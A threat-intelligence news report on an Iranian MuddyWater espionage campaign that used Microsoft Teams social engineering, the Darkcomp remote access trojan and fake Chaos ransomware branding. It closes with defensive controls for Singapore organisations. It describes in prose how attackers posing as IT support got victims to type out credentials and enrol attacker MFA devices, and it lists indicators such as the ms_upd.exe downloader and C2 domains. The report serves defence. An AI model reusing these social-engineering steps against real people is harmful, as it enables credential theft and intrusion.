SINGAPORE, 8 MAY 2026 — Incident responders called to what appeared to be a Chaos ransomware attack discovered something far more serious: a state-sponsored Iranian intelligence operation that had used Microsoft Teams to socially engineer employees, harvest credentials, and deploy a custom remote access trojan — while deploying ransomware branding purely as a distraction from the real objective of sustained intelligence collection.

The campaign, attributed with moderate confidence to MuddyWater — an advanced persistent threat group affiliated with Iran's Ministry of Intelligence and Security (MOIS) — represents a significant evolution in the group's tradecraft. In previous operations, MuddyWater relied on phishing emails and known vulnerability exploitation for initial access. In this campaign, documented by Rapid7's incident response team in early 2026, the attack chain began with unsolicited Microsoft Teams chat requests sent to employees — a vector that many organisations have not adequately controlled, because Teams-based internal communication is indistinguishable in form from the attacker's external messages until after trust has been established.

The Attack Chain: How It Actually Worked

MuddyWater's Teams-based intrusion followed a methodical sequence that exploited both technical weaknesses and human psychology. The initial contact came through external Microsoft Teams messages — requests that bypass email security controls entirely because they arrive through a trusted business application rather than a monitored email channel. The attackers presented as IT support personnel, a persona that is both plausible within a Teams context and specifically effective because employees are conditioned to cooperate with IT requests.

Once an employee accepted the Teams chat, the attacker's next step was to establish a screen-sharing session. Microsoft Teams' screen-sharing functionality is a standard collaboration feature, and employees using it with what they believed was an IT support contact had no obvious reason for suspicion. During the screen-sharing session, victims were instructed to type credentials into plain text files — named `credentials.txt` and `cred.txt` — ostensibly for a troubleshooting process. They were also instructed to add attacker-controlled devices to their multi-factor authentication configurations, effectively issuing the attacker a legitimate MFA credential that would survive the screen-sharing session.

With screen access and the typed credentials visible, the attacker ran a series of discovery commands: `ipconfig /all` to map the network configuration, `whoami` to confirm account privileges, and `net start` to enumerate running services. VPN configuration files were accessed. The full scope of what the attacker could see during the interactive session extended to anything visible on the employee's screen — a breadth of exposure that traditional endpoint detection tools are not designed to flag.

The Malware Chain: Darkcomp and the Legitimate DLL Cover

Following the interactive session, the attacker deployed a custom malware chain designed to achieve persistent access while evading signature-based detection. The first component, `ms_upd.exe`, was a downloader fetched via `curl` from a remote IP address. It retrieved three additional components: `WebView2Loader.dll`, a legitimate Microsoft DLL used to blend the malware chain with expected system activity; `visualwincomp.txt`, an encrypted configuration file; and `Game.exe`, the group's custom remote access trojan designated Darkcomp.

Darkcomp is a sophisticated tool. It impersonates a Microsoft WebView2 application at the process level, making it appear legitimate to casual process inspection. It supports twelve distinct command categories including arbitrary command execution, file upload and deletion, and management of PowerShell and `cmd.exe` shell sessions. Command and control communication runs over port 443 to `uploadfiler[.]com` — a domain that uses HTTPS to blend with normal encrypted web traffic. A second C2 domain, `moonzonet[.]com`, had been previously linked to MuddyWater activity in early 2026, providing an additional thread of attribution continuity.

DWAgent and AnyDesk — both legitimate remote access tools — were also deployed to ensure persistent access even if the custom Darkcomp implant was detected and removed. This layered persistence approach, using legitimate tools alongside custom malware, is characteristic of sophisticated APT groups that anticipate incident response activity and build redundancy into their access architecture.

The Ransomware False Flag: Why MuddyWater Pretended to Be Criminals

The most operationally instructive element of the campaign is what MuddyWater did not do: despite the appearance of a Chaos ransomware attack that triggered the initial incident response engagement, the group never deployed file-encrypting ransomware. No files were encrypted. No ransom demand was made. The Chaos branding was adopted purely to create the appearance of a financially motivated cybercrime attack, directing defenders' attention toward ransomware recovery procedures rather than toward the intelligence collection operation that was the campaign's actual purpose.

This false-flag technique — borrowing ransomware-as-a-service branding to disguise state espionage — is not new to MuddyWater. In late 2025, the group conducted similar activity using the Qilin RaaS brand against an Israeli organisation. The strategic logic is explained by Sergey Shykevich of Check Point Research, who noted in a statement that the approach "gives them considerably more operational flexibility and access to extensive toolkits without the need for internal development investment. It also makes attribution considerably more difficult."

Chaos ransomware itself is a real and active threat. Emerging in February 2025 as a successor to the disrupted BlackSuit operation, Chaos had claimed 36 victims by late March 2026, predominantly in US construction, manufacturing, and services sectors. By borrowing Chaos's visual identity — wallpapers, ransom notes, branding — MuddyWater could send a compromised organisation down a ransomware remediation track while the actual intelligence collection operation continued undetected.

Attribution Evidence

Rapid7's attribution of the campaign to MuddyWater rests on several independent evidence threads. The most specific is a code-signing certificate bearing the name "Donald Gay" (Microsoft ID Verified CS AOC CA 02, with thumbprint B674578D4BDB24CD58BF2DC884EAA658B7AA250C) — a tool documented as part of MuddyWater's shared toolkit across multiple prior operations. The `moonzonet[.]com` C2 domain had been previously attributed to the group in early 2026 activity.

The technique of injecting `pythonw.exe` into suspended processes — used during the lateral movement phase of the campaign — is described by Rapid7 as a "MuddyWater hallmark" observed consistently across the group's operations since 2022. The "IT Support" Teams persona is consistent with MuddyWater's documented preference for social engineering scenarios that exploit employees' inclination to cooperate with apparent internal IT staff. The overall campaign was linked to "Operation Olalampo," a 2026 campaign targeting US and Middle East and North Africa (MENA) organisations, providing campaign-level attribution beyond the individual incident.

Separately, Hunt.io revealed a concurrent Iranian-nexus operation targeting the Omani government, in which over 26,000 Ministry of Justice user records and judicial case data were exfiltrated during the same operational period. While the direct link to MuddyWater's Teams campaign was not confirmed, the geographic and temporal overlap is consistent with a coordinated Iranian intelligence collection programme spanning multiple target categories.

Singapore and ASEAN: The Teams Exposure

Microsoft Teams is deployed across Singapore's public service agencies, financial institutions, and multinational corporations at scale. The platform is the primary internal communication tool for the majority of Singapore's enterprise workforce, with external communication capabilities that are frequently enabled for collaboration with vendors, partners, and clients. This deployment profile creates a substantial attack surface for the Teams-based social engineering technique MuddyWater demonstrated.

The specific risk profile in Singapore has two dimensions. The first is the prevalence of Teams in MAS-regulated financial institutions, where the combination of valuable financial data and a workforce accustomed to rapid digital communication creates the conditions under which the "IT Support" social engineering persona is effective. The second is the presence of Singapore-based regional headquarters for multinational corporations operating across ASEAN, which may share technology environments with entities in MENA regions that MuddyWater has directly targeted.

The MAS Technology Risk Management Guidelines 2021 require multi-factor authentication for systems with access to sensitive data. However, the MuddyWater technique exploits MFA rather than bypassing it: by convincing users to add attacker-controlled devices to their MFA configuration during the Teams session, the group obtains a legitimate MFA credential rather than defeating the control. This distinction matters because it means that organisations fully compliant with MFA requirements remain vulnerable to this specific attack vector if their procedures do not address the social engineering layer.

Immediate Actions for Singapore Security Teams

The first and most operationally impactful control is to review and restrict external Teams messaging permissions. Microsoft Teams allows organisations to configure whether external users can initiate contact with internal employees. For most organisations, external Teams messaging should require explicit opt-in approval from the recipient's IT administrator rather than being available to any verified Microsoft account. Organisations that have not reviewed this setting should do so immediately — it is accessible through the Microsoft Teams Admin Centre under External Access policies.

The second control is to prohibit screen-sharing with external parties without explicit pre-authorisation from a manager or IT security team. Teams' screen-sharing functionality is legitimate and valuable for authorised remote support, but the MuddyWater technique demonstrates that employees cannot reliably distinguish authorised from unauthorised screen-sharing requests when the attacker has established initial trust through the IT support persona. A procedural control requiring employees to confirm external screen-sharing requests through a separate channel — a phone call to the IT service desk, for instance — would defeat this specific attack vector at minimal operational cost.

Security teams should also review endpoint monitoring for the specific indicators of compromise documented by Rapid7: the `ms_upd.exe` downloader, `Game.exe` / Darkcomp RAT activity, C2 communications to `uploadfiler[.]com`, and the `moonzonet[.]com` domain in historical DNS logs. The `pythonw.exe` injection pattern should be added to endpoint detection rules as a high-priority alert trigger. Use of the [RECATOOLS Hash Generator](/tools/hash-generator) can assist in verifying file hashes against the known MuddyWater indicators of compromise published in Rapid7's report.

Sources